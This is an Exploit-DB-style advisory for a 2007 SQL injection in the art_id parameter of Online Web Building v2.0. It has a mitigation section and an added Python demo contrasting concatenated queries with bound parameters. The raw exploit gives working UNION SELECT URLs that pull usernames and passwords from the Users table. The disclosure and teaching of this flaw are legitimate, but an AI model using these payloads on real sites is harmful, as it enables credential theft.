Vendor: Online Web Building v2.0
By: xoron
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Online Web Building v2.0
Affected Version From: Online Web Building v2.0 (id)
Affected Version To: Online Web Building v2.0 (id)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Online Web Building v2.0 (id) Remote SQL Injection

Online Web Building v2.0 (id) is vulnerable to remote SQL injection through the 'art_id' parameter of the 'page.asp' page. By injecting SQL code into this parameter, an attacker can retrieve sensitive information such as usernames and passwords from the 'Users' table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using parameterized queries or prepared statements can help prevent SQL injection attacks.
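
The mitigation above, as an added example that is not part of the original advisory or the product's code: Python's sqlite3 stands in for the ASP data layer, and the Articles table, its columns c1..c9 and the sample rows are assumptions (only Users, Name, PassWord, id and art_id come from the page). It runs the advisory's query string against a concatenated query, then against a bound parameter, then against a bound parameter with integer validation in front of it.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string copied from the advisory; parse_qs decodes '+' to spaces.
PAYLOAD = parse_qs(
    "art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1"
)["art_id"][0]

def make_db():
    # Constructed data. Assumed: the Articles table and columns c1..c9
    # (10 columns in total, matching the column count of the UNION).
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(1, 10))
    db.execute(f"CREATE TABLE Articles (art_id INTEGER PRIMARY KEY, {cols})")
    db.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, Name TEXT, PassWord TEXT)")
    db.execute("INSERT INTO Articles (art_id, c1) VALUES (1, 'Welcome')")
    db.execute("INSERT INTO Users VALUES (1, 'admin', 'constructed-secret')")
    return db

def get_article_vulnerable(db, raw):
    # The flaw: the request value is concatenated into the SQL text.
    return db.execute("SELECT * FROM Articles WHERE art_id = " + raw).fetchall()

def get_article_bound(db, raw):
    # Bound parameter: the value is compared as data, never parsed as SQL.
    return db.execute("SELECT * FROM Articles WHERE art_id = ?", (raw,)).fetchall()

def parse_art_id(raw):
    # Allow-list validation: a short run of ASCII digits and nothing else.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("art_id must be a non-negative integer")
    return int(raw)

def get_article_safe(db, raw):
    # Both layers: validate first, then bind the integer.
    return get_article_bound(db, parse_art_id(raw))

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", get_article_vulnerable(db, PAYLOAD))
    print("bound only:  ", get_article_bound(db, PAYLOAD))
    try:
        get_article_safe(db, PAYLOAD)
    except ValueError as exc:
        print("validated:   ", exc)
```

With the concatenated query the Users row comes back in place of an article; with the bound parameter the same input matches nothing, and the validator rejects it before any query runs.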

Exploit-DB raw data:

----------------------------------------------------------------------

Online Web Building v2.0 (id) Remote SQL Injection

-----------------------------------------------------------------------

Found by: xoron

-----------------------------------------------------------------------

Download:  http://www.aspindir.com/Goster/3439

-----------------------------------------------------------------------
Exploit: http://www.target.com/ page.asp?art_id=[SQL]

Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1

Pass:  page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1

-----------------------------------------------------------------------

Page title is username + password

-----------------------------------------------------------------------

# milw0rm.com [2007-02-20]